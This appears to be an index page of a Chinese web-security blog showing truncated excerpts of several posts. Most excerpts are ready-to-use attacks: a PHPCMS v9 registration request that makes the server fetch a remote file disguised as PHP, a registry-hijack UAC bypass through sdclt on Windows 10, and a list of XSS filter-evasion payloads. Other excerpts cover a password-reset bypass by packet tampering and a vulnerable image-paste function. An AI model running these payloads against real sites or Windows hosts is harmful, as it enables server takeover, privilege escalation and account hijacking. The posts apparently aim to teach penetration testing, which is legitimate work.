1.phpcms文件上传,需要网站开启注册功能
http://192.168.107.138/phpcms/index.php?m=member&c=index&a=register&siteid=1
POST:siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://www.webbaozi.com/phpcmsv9/v9.txt?.php#.jpg>...阅读全文>>
window10:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f
sdclt
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f阅读全文>>
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
<IMG SRC=x >
<INPUT TYPE="BUTTON" action="alert('XSS')"/>
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# ></IFRAME>123</...阅读全文>>
1.忘记密码处
1.1登录确定账号
1.2点击忘记密码
然后回答问题,随便填写一个然后抓包,删除填写的内容
然后放包。
2.文件上传
http://wooyun.webbaozi.com/static/bugs/wooyun-2014-053085.html
首先勾选上返回包。
访问地址:htt...阅读全文>>
众所周知,我们用vmware的时候总要安装vmware-tools来方便我们与宿主机共享文件,这也极大地方便了我们的操作;所以安装也是必要的选择,但是很少有人能了解这里面的原理,小编这就把自己的经验和大家分享一下,给新手朋友提供借鉴!大牛请绕过~~~
0X01:首先在终端输入命令:apt-get install linux-headers-$(uname -r)来查看是否有内核头文件;这也是安装vmware-tools的准备工作之一;然而很多时候很不幸的看到的结果是无法定位软件包或者找不到内核头文件;不要着急,小编帮你解决;请看下一步:
0X02:这时,小...阅读全文>>
前言
有很多工具可以用来对web应用进行自动化测试。其中最有名的应当是sqlmap。Sqlmap让你轻松的通过命令行确认和利用SQL注入漏洞。然而,一些像CSRF、tokens或者简单的的反自动化技术如在一个表单中包含一个隐藏值就能够阻止自动化工具正确的工作。Burp Suite中的Macros是一个绕过这些方法去进行自动化测试的优秀方法,虽然它实现起来有些复杂。
在本文中我们将用一个简单的web程序作为例子,用户可以用这个程序搜索动物的图片。
这是一个使用SQL Server做后端数据库的ASP.NET程序。它有SQL盲注漏洞。我...阅读全文>>
漏洞文件:
/system/module/file/model.php
public function pasteImage($data, $uid)
{
$data = str_replace('"', '"', $data);
if(!$this->checkSavePath()) return false;
ini_set('pcre.backtrack_limit', strlen($data));
preg_match_all('/<img...阅读全文>>
